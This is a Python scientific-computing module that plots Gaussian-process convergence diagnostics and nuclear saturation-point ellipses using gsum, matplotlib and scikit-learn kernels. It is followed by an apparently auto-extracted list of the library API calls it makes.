if return_info:
info = self.model_info(breakdown=breakdown)
info['name'] = path.relpath(name, self.fig_path)
return ax, info
return ax
def plot_coeff_diagnostics(
self, breakdown=None, fig=None, savefig=None, return_info=False,
interp=False, kernel=None, show_excluded=False):
R"""Plots coefficients, the squared Mahalanobis distance, and the pivoted Cholesky diagnostic.
Parameters
----------
breakdown : float, optional
The value for the breakdown scale to use in the diagnostics. If `None`, then its MAP value is used.
fig : matplotlib.figure.Figure, optional
The Figure on which to draw the coefficient plots and diagnostics
savefig : bool, optional
Whether to save the figure. If `None`, this is taken from `self.savefigs`.
Returns
-------
fig : matplotlib.figure.Figure
The figure object
"""
if fig is None:
fig = plt.figure(figsize=(7, 3.2), constrained_layout=True)
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
spec = fig.add_gridspec(nrows=1, ncols=7)
ax_cs = fig.add_subplot(spec[:, :3])
ax_md = fig.add_subplot(spec[:, 3])
ax_pc = fig.add_subplot(spec[:, 4:])
show_2nd_axis = self.system != self.system_strings['difference']
self.plot_coefficients(
breakdown=breakdown, ax=ax_cs, show_process=True, savefig=False, show_2nd_axis=show_2nd_axis,
kernel=kernel, show_excluded=show_excluded,
)
self.plot_md_squared(
breakdown=breakdown, ax=ax_md, savefig=False, interp=interp, kernel=kernel,
show_excluded=show_excluded,
)
self.plot_pchol(
breakdown=breakdown, ax=ax_pc, savefig=False, interp=interp, kernel=kernel,
show_excluded=show_excluded,
)
if savefig is None:
savefig = self.savefigs
if savefig:
name = self.figure_name('cn_diags_', breakdown=breakdown)
# fig.savefig(name, metadata={'hi': [1, 2, 3], 'wtf': 7})
fig.savefig(name)
if return_info:
info = self.model_info(breakdown=breakdown)
info['name'] = path.relpath(name, self.fig_path)
return fig, info
return fig
def plot_credible_diagnostic(
self, breakdown=None, ax=None, savefig=None, truncation=False, show_excluded=False, all_points=False,
show_legend=True, ylabel=r'Empirical Coverage [$\%$]',
):
if ax is None:
fig, ax = plt.subplots(figsize=(3.2, 3.2))
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
if truncation:
model = gm.TruncationGP(
ratio=self.ratio, ref=self.ref, excluded=self.excluded,
ratio_kws=dict(breakdown=breakdown), **self.kwargs
)
model.fit(self.X_train, y=self.y_train, orders=self.orders)
if all_points:
X = self.X
y = self.y
else:
X = self.X_valid
y = self.y_valid
if show_excluded:
orders = self.orders
colors = self.colors
else:
y = y[:, self.excluded_mask]
orders = self.orders_not_excluded
colors = self.colors_not_excluded
# Get the covariance without any Q junk
# norm_trunc_cov = model.cov(X, start=0, end=0)
ref = model.ref(X)
norm_trunc_cov = ref[:, None] * ref * model.coeffs_process.cov(X=X)
# Get the between-order residuals
residuals = np.diff(y)
Q = self.ratio(X)
# Normalize them based on the approximate size of the next order correction
# This is so that we can use the same Q-less covariance for each correction
norm_residuals = residuals / Q[:, None] ** orders[1:]
graph = gm.GraphicalDiagnostic(
norm_residuals, mean=np.zeros(X.shape[0]),
cov=norm_trunc_cov, colors=colors, gray=gray, black=softblack
)
else:
graph = self.compute_underlying_graphical_diagnostic(breakdown=breakdown, show_excluded=show_excluded)
obs = self.system_math_string
intervals = np.linspace(1e-5, 1, 100)
band_perc = [0.68, 0.95]
if show_excluded:
linestyles = self.linestyles
else:
linestyles = self.linestyles_not_excluded
ax = graph.credible_interval(
intervals=intervals, band_perc=band_perc,
# title=rf'${self.CI_label}({obs})$',
title=None,
ax=ax,
xlabel=r'Credible Interval [$\%$]', ylabel=ylabel,
linestyles=linestyles
)
ax.set_xticks([0, 0.2, 0.4, 0.6, 0.8, 1])
ax.set_xticklabels([0, 20, 40, 60, 80, 100])
ax.set_yticks([0, 0.2, 0.4, 0.6, 0.8, 1])
ax.set_yticklabels([0, 20, 40, 60, 80, 100])
if truncation and show_legend:
handles, labels = ax.get_legend_handles_labels()
ax.set_title('')
ax.legend(handles=handles, labels=[r'LO', r'NLO', r'N$^{2}$LO'], title=rf'${self.CI_label}({obs})$')
fig = plt.gcf()
if savefig is None:
savefig = self.savefigs
if savefig:
name = self.figure_name(f'ci_diag_trunc-{truncation}_', breakdown=breakdown)
fig.savefig(name)
return fig
def plot_empirical_saturation(self, ax=None, is_density_primary=True):
from matplotlib.patches import Rectangle
# From Drischler 2018 arXiv:1710.08220
n0 = 0.164
n0_std = 0.007
y0 = -15.86
# y0_std = np.sqrt(0.37 ** 2 + 0.2 ** 2)
y0_std = 0.57 # They add the errors linearly
left = n0 - n0_std
right = n0 + n0_std
if not is_density_primary:
left = self.compute_momentum(left)
right = self.compute_momentum(right)
rect = Rectangle(
(left, y0 - y0_std), width=right - left, height=2 * y0_std,
facecolor='lightgray', edgecolor='gray', alpha=0.4, zorder=9,
)
ax.add_patch(rect)
return ax
def plot_saturation(self, breakdown=None, order=4, ax=None, savefig=None, color=None, nugget=0, X=None,
cond=None, n_samples=1000, is_density_primary=True, **kwargs):
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
if ax is None:
ax = plt.gca()
if X is None:
X = self.X
x_min_no_trunc, y_min_no_trunc, x_min, y_min, pred, cov = self.compute_minimum(
order=order, n_samples=n_samples, breakdown=breakdown, X=X, nugget=nugget, cond=cond
)
if 'zorder' not in kwargs:
zorder = order / 10
else:
zorder = kwargs.copy().pop('zorder')
if cond is None:
cond = slice(None, None)
# ord_idx = self.order_index(order)
ord_idx = np.squeeze(np.argwhere(self.orders_original == order))
approx_xlim = x_min.min() - 0.03, x_min.max() + 0.03
approx_xlim_mask = (self.X[cond].ravel() >= approx_xlim[0]) & (self.X[cond].ravel() <= approx_xlim[1])
# is_density_primary = True
if is_density_primary:
x_min_no_trunc = self.compute_density(x_min_no_trunc)
x_min = self.compute_density(x_min)
x_all = self.compute_density(X.ravel())
else:
x_all = X.ravel()
if color is None:
color = self.colors_original[ord_idx]
light_color = lighten_color(color)
# TODO: Add scatter plots
# compute z-scores from all EDFs?
stdv = np.sqrt(np.diag(cov))
from matplotlib.collections import LineCollection
# ax.fill_between(X.ravel(), pred+stdv, pred-stdv, color=color, zorder=0, alpha=0.5)
# ax.plot(X.ravel(), pred, c=color)
ax.fill_between(
x_all, pred+2*stdv, pred-2*stdv, facecolor=light_color,
edgecolor=color, alpha=0.3, zorder=zorder
)
print('Order', order)
print('x:', np.mean(x_min), '+/-', np.std(x_min))
print('y:', np.mean(y_min), '+/-', np.std(y_min))
print('mean:\n', np.array([np.mean(x_min), np.mean(y_min)]))
print('cov:\n', np.cov(x_min, y_min))
ellipse = confidence_ellipse(
x_min, y_min, ax=ax, n_std=2, facecolor=light_color,
edgecolor=color, zorder=zorder, show_scatter=True, **kwargs
)
col = LineCollection([
np.column_stack((x_all, pred)),
np.column_stack((x_all, pred + 2 * stdv)),
np.column_stack((x_all, pred - 2 * stdv))
], colors=[color, color, color], linewidths=[1.2, 0.7, 0.7], linestyles=['-', '-', '-'], zorder=zorder + 1e-2)
ax.add_collection(col, autolim=False)
# ax.plot(x_min_no_trunc, y_min_no_trunc, marker='x', ls='', markerfacecolor=color,
# markeredgecolor='k', markeredgewidth=0.5, label='True', zorder=10)
ax.scatter(x_min_no_trunc, y_min_no_trunc, marker='X', facecolor=color,
edgecolors='k', label=fr'min($y_{order}$)', zorder=10)
# ax.scatter(x_min, y_min, marker='X', facecolor=color,
# edgecolors='k', label=fr'min($y_{order}$)', zorder=10)
if self.body == 'NN-only':
y = self.y2
elif self.body == 'NN+3N':
y = self.y3
elif self.body == 'Appended':
y = self.y3
elif self.body == '3N':
y = self.y3
else:
raise ValueError('body not in allowed values')
if is_density_primary:
# ax.plot(self.density[cond][approx_xlim_mask], y[cond, ord_idx][approx_xlim_mask],
# ls='', marker='o', c=color, zorder=zorder)
ax.set_xlabel(r'Density $n$ [fm$^{-3}$]')
else:
# ax.plot(self.X[cond][approx_xlim_mask], y[cond, ord_idx][approx_xlim_mask],
# ls='', marker='o', c=color, zorder=zorder)
ax.set_xlabel(r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]')
ax.set_ylabel(r'Energy per Particle $E/A$')
# kf_ticks = ax.get_xticks()
# d_ticks = self.compute_momentum(kf_ticks)
# k_min, k_max = ax.get_xlim()
# d = self.compute_density(np.array([k_min, k_max]))
# ax2 = ax.twiny()
# ax2.plot(d_ticks, np.average(y_min) * np.ones_like(d_ticks), ls='')
# ax2.set_xticks(d_ticks)
# is_density_primary = True
self.plot_empirical_saturation(ax=ax, is_density_primary=is_density_primary)
if savefig:
pass
return ax, ellipse
def plot_multi_saturation(self, breakdown=None, orders=None, ax=None, savefig=None, nugget=0, X=None,
cond=None, n_samples=1000, legend_kwargs=None, **kwargs):
if orders is None:
orders = [3, 4]
if ax is None:
ax = plt.gca()
if legend_kwargs is None:
legend_kwargs = dict()
if breakdown is None:
breakdown = self.breakdown_map[-1]
print('Using breakdown =', breakdown, 'MeV')
ellipses = []
ellipses_labels = []
for order in orders:
# idx = self.order_index(order)
idx = np.squeeze(np.argwhere(self.orders_original == order))
_, ellipse = self.plot_saturation(
breakdown=breakdown, order=order, ax=ax, savefig=False, color=self.colors_original[idx],
nugget=nugget, X=X, cond=cond, n_samples=n_samples, **kwargs)
ellipses.append(ellipse)
ellipses_labels.append(rf'$2\sigma(y_{{{order}}}+\delta y_{{{order}}})$')
ax.margins(x=0)
handles, labels = ax.get_legend_handles_labels()
handles = handles + ellipses
labels = labels + ellipses_labels
ax.legend(handles, labels, **legend_kwargs)
fig = plt.gcf()
# fig.tight_layout()
if savefig:
ords = [f'-{order}' for order in orders]
ords = ''.join(ords)
name = self.figure_name(f'sat_ellipse_ords{ords}_', breakdown=breakdown)
print(name)
fig.savefig(name)
return ax
class CorrKernel(Kernel):
R"""A basic kernel with rho on the off-diagonal blocks. Will assume that all 4 blocks are the same size.
The diagonal blocks are filled with ones, and the off-diagonal blocks are filled with rho.
"""
def __init__(self, rho=0.5, rho_bounds=(1e-5, 1), std1=1, std2=1):
self.rho = rho
self.rho_bounds = rho_bounds
self.std1 = std1
self.std2 = std2
@property
def hyperparameter_rho(self):
from sklearn.gaussian_process.kernels import Hyperparameter
return Hyperparameter("rho", "numeric", self.rho_bounds)
def __call__(self, X, Y=None, eval_gradient=False):
nx = ny = len(X)
if Y is not None:
ny = len(Y)
ix = nx // 2
iy = ny // 2
stds_x = np.concatenate((self.std1 * np.ones(ix), self.std2 * np.ones(ix)))
stds_y = np.concatenate((self.std1 * np.ones(iy), self.std2 * np.ones(iy)))
K = np.ones((nx, ny), dtype=float)
K[ix:, :iy] = K[:ix, iy:] = self.rho
K *= stds_x[:, None] * stds_y
if eval_gradient:
dK = np.zeros((nx, ny, 1), dtype=float)
dK[ix:, :iy] = dK[:ix, iy:] = 1.
dK *= stds_x[:, None, None] * stds_y[None, :, None]
return K, dK
return K
def diag(self, X):
return np.ones(X.shape[0])
def is_stationary(self):
return False
def __repr__(self):
return "{0}(rho={1:.3g})".format(
self.__class__.__name__, self.rho) | [
"seaborn.utils.despine",
"matplotlib.pyplot.rc_context",
"numpy.log",
"numpy.column_stack",
"numpy.isin",
"matplotlib.ticker.MaxNLocator",
"numpy.cov",
"numpy.arange",
"numpy.exp",
"numpy.concatenate",
"warnings.warn",
"matplotlib.cm.get_cmap",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.g... | [((768, 795), 'docrep.DocstringProcessor', 'docrep.DocstringProcessor', ([], {}), '()\n', (793, 795), False, 'import docrep\n'), ((2330, 2371), 'numpy.trapz', 'np.trapz', (['posterior_2d'], {'x': 'lengths', 'axis': '(0)'}), '(posterior_2d, x=lengths, axis=0)\n', (2338, 2371), True, 'import numpy as np\n'), ((2393, 2430), 'numpy.trapz', 'np.trapz', (['breakdown_pdf'], {'x': 'breakdowns'}), '(breakdown_pdf, x=breakdowns)\n', (2401, 2430), True, 'import numpy as np\n'), ((3011, 3038), 'gsum.median_pdf', 'gm.median_pdf', ([], {'pdf': 'pdf', 'x': 'x'}), '(pdf=pdf, x=x)\n', (3024, 3038), True, 'import gsum as gm\n'), ((3737, 3773), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(height, height)'}), '(figsize=(height, height))\n', (3747, 3773), True, 'import matplotlib.pyplot as plt\n'), ((3784, 3818), 'matplotlib.pyplot.GridSpec', 'plt.GridSpec', (['(ratio + 1)', '(ratio + 1)'], {}), '(ratio + 1, ratio + 1)\n', (3796, 3818), True, 'import matplotlib.pyplot as plt\n'), ((4745, 4783), 'seaborn.utils.despine', 'utils.despine', ([], {'ax': 'ax_marg_x', 'left': '(True)'}), '(ax=ax_marg_x, left=True)\n', (4758, 4783), False, 'from seaborn import utils\n'), ((4788, 4828), 'seaborn.utils.despine', 'utils.despine', ([], {'ax': 'ax_marg_y', 'bottom': '(True)'}), '(ax=ax_marg_y, bottom=True)\n', (4801, 4828), False, 'from seaborn import utils\n'), ((6106, 6123), 'numpy.atleast_1d', 'np.atleast_1d', (['ls'], {}), '(ls)\n', (6119, 6123), True, 'import numpy as np\n'), ((6358, 6385), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (6383, 6385), False, 'import multiprocessing\n'), ((6900, 6941), 'numpy.trapz', 'np.trapz', (['joint_pdf'], {'x': 'breakdown', 'axis': '(-1)'}), '(joint_pdf, x=breakdown, axis=-1)\n', (6908, 6941), True, 'import numpy as np\n'), ((6981, 7021), 'numpy.trapz', 'np.trapz', (['ratio_pdf'], {'x': 'breakdown', 'axis': '(0)'}), '(ratio_pdf, x=breakdown, axis=0)\n', (6989, 7021), True, 'import numpy as np\n'), ((14106, 14151), 'scipy.stats.multivariate_normal', 'stats.multivariate_normal', ([], {'mean': 'mean', 'cov': 'cov'}), '(mean=mean, cov=cov)\n', (14131, 14151), False, 'from scipy import stats\n'), ((14191, 14217), 'numpy.argmin', 'np.argmin', (['samples'], {'axis': '(1)'}), '(samples, axis=1)\n', (14200, 14217), True, 'import numpy as np\n'), ((14230, 14253), 'numpy.min', 'np.min', (['samples'], {'axis': '(1)'}), '(samples, axis=1)\n', (14236, 14253), True, 'import numpy as np\n'), ((16855, 16911), 'colorsys.hls_to_rgb', 'colorsys.hls_to_rgb', (['c[0]', '(1 - amount * (1 - c[1]))', 'c[2]'], {}), '(c[0], 1 - amount * (1 - c[1]), c[2])\n', (16874, 16911), False, 'import colorsys\n'), ((21936, 21949), 'numpy.asarray', 'np.asarray', (['m'], {}), '(m)\n', (21946, 21949), True, 'import numpy as np\n'), ((22269, 22299), 'numpy.array', 'array', (['m'], {'ndmin': '(2)', 'dtype': 'dtype'}), '(m, ndmin=2, dtype=dtype)\n', (22274, 22299), False, 'from numpy import array, average, dot\n'), ((23922, 23966), 'numpy.average', 'average', (['X'], {'axis': '(1)', 'weights': 'w', 'returned': '(True)'}), '(X, axis=1, weights=w, returned=True)\n', (23929, 23966), False, 'from numpy import array, average, dot\n'), ((24520, 24543), 'numpy.true_divide', 'np.true_divide', (['(1)', 'fact'], {}), '(1, fact)\n', (24534, 24543), True, 'import numpy as np\n'), ((25296, 25334), 'numpy.block', 'np.block', (['[[K1, K_off], [K_off.T, K2]]'], {}), '([[K1, K_off], [K_off.T, K2]])\n', (25304, 25334), True, 'import numpy as np\n'), ((25622, 25641), 'numpy.atleast_1d', 'np.atleast_1d', (['ref1'], {}), '(ref1)\n', (25635, 25641), True, 'import numpy as np\n'), ((25653, 25672), 'numpy.atleast_1d', 'np.atleast_1d', (['ref2'], {}), '(ref2)\n', (25666, 25672), True, 'import numpy as np\n'), ((26133, 26152), 'numpy.atleast_1d', 'np.atleast_1d', (['ref1'], {}), '(ref1)\n', (26146, 26152), True, 'import numpy as np\n'), ((26164, 26183), 'numpy.atleast_1d', 'np.atleast_1d', (['ref2'], {}), '(ref2)\n', (26177, 26183), True, 'import numpy as np\n'), ((26976, 27014), 'numpy.block', 'np.block', (['[[K1, K_off], [K_off.T, K2]]'], {}), '([[K1, K_off], [K_off.T, K2]])\n', (26984, 27014), True, 'import numpy as np\n'), ((1275, 1352), 'matplotlib.patches.Ellipse', 'mpatches.Ellipse', ([], {'xy': 'center', 'width': '(width + xdescent)', 'height': '(height + ydescent)'}), '(xy=center, width=width + xdescent, height=height + ydescent)\n', (1291, 1352), True, 'import matplotlib.patches as mpatches\n'), ((2053, 2068), 'numpy.exp', 'np.exp', (['log_ell'], {}), '(log_ell)\n', (2059, 2068), True, 'import numpy as np\n'), ((2097, 2112), 'numpy.log', 'np.log', (['lengths'], {}), '(lengths)\n', (2103, 2112), True, 'import numpy as np\n'), ((2964, 2997), 'gsum.hpd_pdf', 'gm.hpd_pdf', ([], {'pdf': 'pdf', 'alpha': 'p', 'x': 'x'}), '(pdf=pdf, alpha=p, x=x)\n', (2974, 2997), True, 'import gsum as gm\n'), ((3190, 3199), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3197, 3199), True, 'import matplotlib.pyplot as plt\n'), ((6019, 6061), 'numpy.exp', 'np.exp', (['model.coeffs_process.kernel_.theta'], {}), '(model.coeffs_process.kernel_.theta)\n', (6025, 6061), True, 'import numpy as np\n'), ((6801, 6834), 'numpy.trapz', 'np.trapz', (['joint_pdf'], {'x': 'ls', 'axis': '(0)'}), '(joint_pdf, x=ls, axis=0)\n', (6809, 6834), True, 'import numpy as np\n'), ((6865, 6886), 'numpy.squeeze', 'np.squeeze', (['joint_pdf'], {}), '(joint_pdf)\n', (6875, 6886), True, 'import numpy as np\n'), ((7060, 7090), 'numpy.trapz', 'np.trapz', (['ls_pdf'], {'x': 'ls', 'axis': '(0)'}), '(ls_pdf, x=ls, axis=0)\n', (7068, 7090), True, 'import numpy as np\n'), ((7389, 7454), 'matplotlib.pyplot.rc_context', 'plt.rc_context', (["{'text.usetex': True, 'text.latex.preview': True}"], {}), "({'text.usetex': True, 'text.latex.preview': True})\n", (7403, 7454), True, 'import matplotlib.pyplot as plt\n'), ((7499, 7518), 'matplotlib.cm.get_cmap', 'get_cmap', (['cmap_name'], {}), '(cmap_name)\n', (7507, 7518), False, 'from matplotlib.cm import get_cmap\n'), ((8743, 8753), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8751, 8753), True, 'import matplotlib.pyplot as plt\n'), ((10448, 10486), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'figsize': '(3.4, 3.4)'}), '(1, 1, figsize=(3.4, 3.4))\n', (10460, 10486), True, 'import matplotlib.pyplot as plt\n'), ((10905, 10968), 'seaborn.color_palette', 'sns.color_palette', (['palette'], {'n_colors': 'n_colors', 'desat': 'saturation'}), '(palette, n_colors=n_colors, desat=saturation)\n', (10922, 10968), True, 'import seaborn as sns\n'), ((11140, 11153), 'matplotlib.pyplot.margins', 'plt.margins', ([], {}), '()\n', (11151, 11153), True, 'import matplotlib.pyplot as plt\n'), ((22061, 22090), 'numpy.result_type', 'np.result_type', (['m', 'np.float64'], {}), '(m, np.float64)\n', (22075, 22090), True, 'import numpy as np\n'), ((22113, 22126), 'numpy.asarray', 'np.asarray', (['y'], {}), '(y)\n', (22123, 22126), True, 'import numpy as np\n'), ((22227, 22259), 'numpy.result_type', 'np.result_type', (['m', 'y', 'np.float64'], {}), '(m, y, np.float64)\n', (22241, 22259), True, 'import numpy as np\n'), ((22455, 22497), 'numpy.array', 'array', (['y'], {'copy': '(False)', 'ndmin': '(2)', 'dtype': 'dtype'}), '(y, copy=False, ndmin=2, dtype=dtype)\n', (22460, 22497), False, 'from numpy import array, average, dot\n'), ((22573, 22603), 'numpy.concatenate', 'np.concatenate', (['(X, y)'], {'axis': '(0)'}), '((X, y), axis=0)\n', (22587, 22603), True, 'import numpy as np\n'), ((22815, 22848), 'numpy.asarray', 'np.asarray', (['fweights'], {'dtype': 'float'}), '(fweights, dtype=float)\n', (22825, 22848), True, 'import numpy as np\n'), ((23415, 23448), 'numpy.asarray', 'np.asarray', (['aweights'], {'dtype': 'float'}), '(aweights, dtype=float)\n', (23425, 23448), True, 'import numpy as np\n'), ((24263, 24348), 'warnings.warn', 'warnings.warn', (['"""Degrees of freedom <= 0 for slice"""', 'RuntimeWarning'], {'stacklevel': '(3)'}), "('Degrees of freedom <= 0 for slice', RuntimeWarning, stacklevel=3\n )\n", (24276, 24348), False, 'import warnings\n'), ((24679, 24713), 'numpy.sqrt', 'np.sqrt', (['((ls1 ** 2 + ls2 ** 2) / 2)'], {}), '((ls1 ** 2 + ls2 ** 2) / 2)\n', (24686, 24713), True, 'import numpy as np\n'), ((24728, 24774), 'numpy.sqrt', 'np.sqrt', (['(2 * ls1 * ls2 / (ls1 ** 2 + ls2 ** 2))'], {}), '(2 * ls1 * ls2 / (ls1 ** 2 + ls2 ** 2))\n', (24735, 24774), True, 'import numpy as np\n'), ((24814, 24841), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std1 * std2)'], {}), '(std1 * std2)\n', (24828, 24841), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((24844, 24855), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls_off'], {}), '(ls_off)\n', (24847, 24855), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25010, 25035), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std1 ** 2)'], {}), '(std1 ** 2)\n', (25024, 25035), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25038, 25046), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (25041, 25046), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25363, 25386), 'numpy.diag_indices_from', 'np.diag_indices_from', (['K'], {}), '(K)\n', (25383, 25386), True, 'import numpy as np\n'), ((25838, 25858), 'numpy.sqrt', 'np.sqrt', (['(1 - Q1 ** 2)'], {}), '(1 - Q1 ** 2)\n', (25845, 25858), True, 'import numpy as np\n'), ((25881, 25901), 'numpy.sqrt', 'np.sqrt', (['(1 - Q2 ** 2)'], {}), '(1 - Q2 ** 2)\n', (25888, 25901), True, 'import numpy as np\n'), ((26422, 26437), 'numpy.sqrt', 'np.sqrt', (['Q_num1'], {}), '(Q_num1)\n', (26429, 26437), True, 'import numpy as np\n'), ((26440, 26460), 'numpy.sqrt', 'np.sqrt', (['(1 - Q1 ** 2)'], {}), '(1 - Q1 ** 2)\n', (26447, 26460), True, 'import numpy as np\n'), ((26474, 26489), 'numpy.sqrt', 'np.sqrt', (['Q_num2'], {}), '(Q_num2)\n', (26481, 26489), True, 'import numpy as np\n'), ((26492, 26512), 'numpy.sqrt', 'np.sqrt', (['(1 - Q2 ** 2)'], {}), '(1 - Q2 ** 2)\n', (26499, 26512), True, 'import numpy as np\n'), ((26523, 26548), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std1 ** 2)'], {}), '(std1 ** 2)\n', (26537, 26548), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26551, 26559), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (26554, 26559), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((27043, 27066), 'numpy.diag_indices_from', 'np.diag_indices_from', (['K'], {}), '(K)\n', (27063, 27066), True, 'import numpy as np\n'), ((30632, 30653), 'numpy.atleast_1d', 'np.atleast_1d', (['orders'], {}), '(orders)\n', (30645, 30653), True, 'import numpy as np\n'), ((35133, 35158), 'numpy.atleast_1d', 'np.atleast_1d', (['colors_all'], {}), '(colors_all)\n', (35146, 35158), True, 'import numpy as np\n'), ((35303, 35333), 'numpy.atleast_1d', 'np.atleast_1d', (['colors_original'], {}), '(colors_original)\n', (35316, 35333), True, 'import numpy as np\n'), ((35542, 35564), 'numpy.atleast_1d', 'np.atleast_1d', (['markers'], {}), '(markers)\n', (35555, 35564), True, 'import numpy as np\n'), ((35676, 35707), 'numpy.atleast_1d', 'np.atleast_1d', (['markerfillstyles'], {}), '(markerfillstyles)\n', (35689, 35707), True, 'import numpy as np\n'), ((35825, 35850), 'numpy.atleast_1d', 'np.atleast_1d', (['linestyles'], {}), '(linestyles)\n', (35838, 35850), True, 'import numpy as np\n'), ((36172, 36220), 'gsum.coefficients', 'gm.coefficients', (['self.y', 'ratio', 'ref', 'self.orders'], {}), '(self.y, ratio, ref, self.orders)\n', (36187, 36220), True, 'import gsum as gm\n'), ((43274, 43330), 'numpy.linspace', 'np.linspace', (['breakdown_min', 'breakdown_max', 'breakdown_num'], {}), '(breakdown_min, breakdown_max, breakdown_num)\n', (43285, 43330), True, 'import numpy as np\n'), ((43552, 43574), 'numpy.atleast_1d', 'np.atleast_1d', (['max_idx'], {}), '(max_idx)\n', (43565, 43574), True, 'import numpy as np\n'), ((45312, 45355), 'pandas.concat', 'pd.concat', (['dfs_breakdown'], {'ignore_index': '(True)'}), '(dfs_breakdown, ignore_index=True)\n', (45321, 45355), True, 'import pandas as pd\n'), ((45480, 45519), 'pandas.concat', 'pd.concat', (['dfs_joint'], {'ignore_index': '(True)'}), '(dfs_joint, ignore_index=True)\n', (45489, 45519), True, 'import pandas as pd\n'), ((46834, 46874), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**gp_kwargs)\n', (46861, 46874), True, 'import gsum as gm\n'), ((47542, 47681), 'gsum.GraphicalDiagnostic', 'gm.GraphicalDiagnostic', (['data', 'mean', 'cov'], {'colors': 'colors', 'gray': 'gray', 'black': 'softblack', 'markerfillstyles': 'markerfillstyles', 'markers': 'markers'}), '(data, mean, cov, colors=colors, gray=gray, black=\n softblack, markerfillstyles=markerfillstyles, markers=markers)\n', (47564, 47681), True, 'import gsum as gm\n'), ((47913, 48004), 'gsum.TruncationGP', 'gm.TruncationGP', ([], {'ref': 'self.ref', 'ratio': 'self.ratio', 'excluded': 'self.excluded'}), '(ref=self.ref, ratio=self.ratio, excluded=self.excluded, **\n self.kwargs)\n', (47928, 48004), True, 'import gsum as gm\n'), ((51710, 51725), 'numpy.argmin', 'np.argmin', (['pred'], {}), '(pred)\n', (51719, 51725), True, 'import numpy as np\n'), ((53579, 53609), 'os.path.join', 'join', (['self.fig_path', 'full_name'], {}), '(self.fig_path, full_name)\n', (53583, 53609), False, 'from os.path import join\n'), ((58177, 58219), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**self.kwargs)\n', (58204, 58219), True, 'import gsum as gm\n'), ((79519, 79545), 'numpy.linspace', 'np.linspace', (['(1e-05)', '(1)', '(100)'], {}), '(1e-05, 1, 100)\n', (79530, 79545), True, 'import numpy as np\n'), ((80469, 80478), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (80476, 80478), True, 'import matplotlib.pyplot as plt\n'), ((81239, 81374), 'matplotlib.patches.Rectangle', 'Rectangle', (['(left, y0 - y0_std)'], {'width': '(right - left)', 'height': '(2 * y0_std)', 'facecolor': '"""lightgray"""', 'edgecolor': '"""gray"""', 'alpha': '(0.4)', 'zorder': '(9)'}), "((left, y0 - y0_std), width=right - left, height=2 * y0_std,\n facecolor='lightgray', edgecolor='gray', alpha=0.4, zorder=9)\n", (81248, 81374), False, 'from matplotlib.patches import Rectangle\n'), ((87333, 87342), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (87340, 87342), True, 'import matplotlib.pyplot as plt\n'), ((88190, 88239), 'sklearn.gaussian_process.kernels.Hyperparameter', 'Hyperparameter', (['"""rho"""', '"""numeric"""', 'self.rho_bounds'], {}), "('rho', 'numeric', self.rho_bounds)\n", (88204, 88239), False, 'from sklearn.gaussian_process.kernels import Hyperparameter\n'), ((88597, 88627), 'numpy.ones', 'np.ones', (['(nx, ny)'], {'dtype': 'float'}), '((nx, ny), dtype=float)\n', (88604, 88627), True, 'import numpy as np\n'), ((88981, 89000), 'numpy.ones', 'np.ones', (['X.shape[0]'], {}), '(X.shape[0])\n', (88988, 89000), True, 'import numpy as np\n'), ((2291, 2307), 'numpy.max', 'np.max', (['log_like'], {}), '(log_like)\n', (2297, 2307), True, 'import numpy as np\n'), ((6742, 6758), 'numpy.max', 'np.max', (['log_like'], {}), '(log_like)\n', (6748, 6758), True, 'import numpy as np\n'), ((8012, 8034), 'numpy.zeros_like', 'np.zeros_like', (['like_Lb'], {}), '(like_Lb)\n', (8025, 8034), True, 'import numpy as np\n'), ((8204, 8226), 'numpy.zeros_like', 'np.zeros_like', (['ls_vals'], {}), '(ls_vals)\n', (8217, 8226), True, 'import numpy as np\n'), ((11678, 11704), 'numpy.trapz', 'np.trapz', (['pdf_vals', 'x_vals'], {}), '(pdf_vals, x_vals)\n', (11686, 11704), True, 'import numpy as np\n'), ((13085, 13142), 'matplotlib.patches.Patch', 'Patch', ([], {'facecolor': 'color', 'edgecolor': 'darkgray', 'label': 'leg_val'}), '(facecolor=color, edgecolor=darkgray, label=leg_val)\n', (13090, 13142), False, 'from matplotlib.patches import Patch\n'), ((16830, 16842), 'matplotlib.colors.to_rgb', 'mc.to_rgb', (['c'], {}), '(c)\n', (16839, 16842), True, 'import matplotlib.colors as mc\n'), ((25080, 25105), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (25094, 25105), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25108, 25116), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls2'], {}), '(ls2)\n', (25111, 25116), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), 